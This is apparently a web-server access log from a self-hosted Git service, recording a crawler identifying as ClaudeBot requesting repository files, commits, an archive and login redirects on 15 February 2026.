"/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 1916] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=.Notebook" [Client 216.73.216.188] [Length 52267] [Gzip 9.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx" [Client 216.73.216.188] [Length 9843] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_error.log" [Client 216.73.216.188] [Length 1529] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/services/geminiService.ts?display=source" [Client 216.73.216.188] [Length 13128] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcompare%2Fmain...main" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2FProgram.cs" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py" [Client 216.73.216.188] [Length 9906] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json" [Client 216.73.216.188] [Length 9849] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 216.73.216.188] [Length 10027] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/.gitignore" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/style.css.justbefore" [Client 216.73.216.188] [Length 18468] [Gzip 6.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 13499] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/.gitignore" -[15/Feb/2026:09:31:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/.TemporaryDocument/assetpilot.ico" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js" [Client 216.73.216.188] [Length 25520] [Gzip 7.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html" [Client 216.73.216.188] [Length 21952] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/.TemporaryDocument/assetpilot.ico" -[15/Feb/2026:09:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/services" [Client 216.73.216.188] [Length 9925] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/README.md?display=rendered" [Client 216.73.216.188] [Length 13576] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json" [Client 216.73.216.188] [Length 267] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Worker.cs" [Client 216.73.216.188] [Length 588] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 216.73.216.188] [Length 11101] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html" [Client 216.73.216.188] [Length 16333] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/nginx-reverse-proxy.conf?display=source" [Client 216.73.216.188] [Length 11644] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/.TemporaryDocument" [Client 216.73.216.188] [Length 11406] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.vscode/settings.json" [Client 216.73.216.188] [Length 9801] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml" [Client 216.73.216.188] [Length 9836] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/js/script.js?display=rendered" [Client 216.73.216.188] [Length 10907] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.gitignore" [Client 216.73.216.188] [Length 11108] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup" [Client 216.73.216.188] [Length 11444] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_http_error.log" [Client 216.73.216.188] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/types.ts" [Client 216.73.216.188] [Length 302] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/MIGRATION_GUIDE.md?display=source" [Client 216.73.216.188] [Length 21149] [Gzip 6.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/status.json" [Client 216.73.216.188] [Length 11023] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets" [Client 216.73.216.188] [Length 10634] [Gzip 4.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/start.sh?display=rendered" [Client 216.73.216.188] [Length 11167] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/database.py" [Client 216.73.216.188] [Length 753] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml" [Client 216.73.216.188] [Length 10506] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/archive/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa.tar.gz" [Client 216.73.216.188] [Length 234320] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/script.js?display=rendered" [Client 216.73.216.188] [Length 10959] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/components/Header.tsx" [Client 216.73.216.188] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/.vscode/settings.json" [Client 216.73.216.188] [Length 889] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/init_db.py?display=source" [Client 216.73.216.188] [Length 16139] [Gzip 5.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/index.html" [Client 216.73.216.188] [Length 47148] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 9909] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates/index.html" [Client 216.73.216.188] [Length 16416] [Gzip 5.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/vite.config.ts" [Client 216.73.216.188] [Length 11886] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props?display=rendered" [Client 216.73.216.188] [Length 10964] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/index.html?display=source" [Client 216.73.216.188] [Length 22662] [Gzip 7.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 216.73.216.188] [Length 1084] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3?style=split&whitespace=ignore-eol" [Client 216.73.216.188] [Length 68186] [Gzip 10.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" [Client 216.73.216.188] [Length 14667] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/appsettings.json" [Client 216.73.216.188] [Length 9897] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 216.73.216.188] [Length 9937] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.assets.json" [Client 216.73.216.188] [Length 9905] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/.gitignore?display=rendered" [Client 216.73.216.188] [Length 10874] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12" [Client 216.73.216.188] [Length 9934] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/updateRecord.md?display=rendered" [Client 216.73.216.188] [Length 16208] [Gzip 2.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json" [Client 216.73.216.188] [Length 9837] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json?display=source" [Client 216.73.216.188] [Length 12969] [Gzip 4.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/obj/project.nuget.cache" [Client 216.73.216.188] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/.TemporaryDocument/assetpilot.ico" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml" [Client 216.73.216.188] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/.TemporaryDocument/assetpilot.ico" -[15/Feb/2026:09:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 216.73.216.188] [Length 571] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data" [Client 216.73.216.188] [Length 9817] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml" [Client 216.73.216.188] [Length 1058] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images" [Client 216.73.216.188] [Length 10378] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Properties/launchSettings.json?display=source" [Client 216.73.216.188] [Length 11468] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr 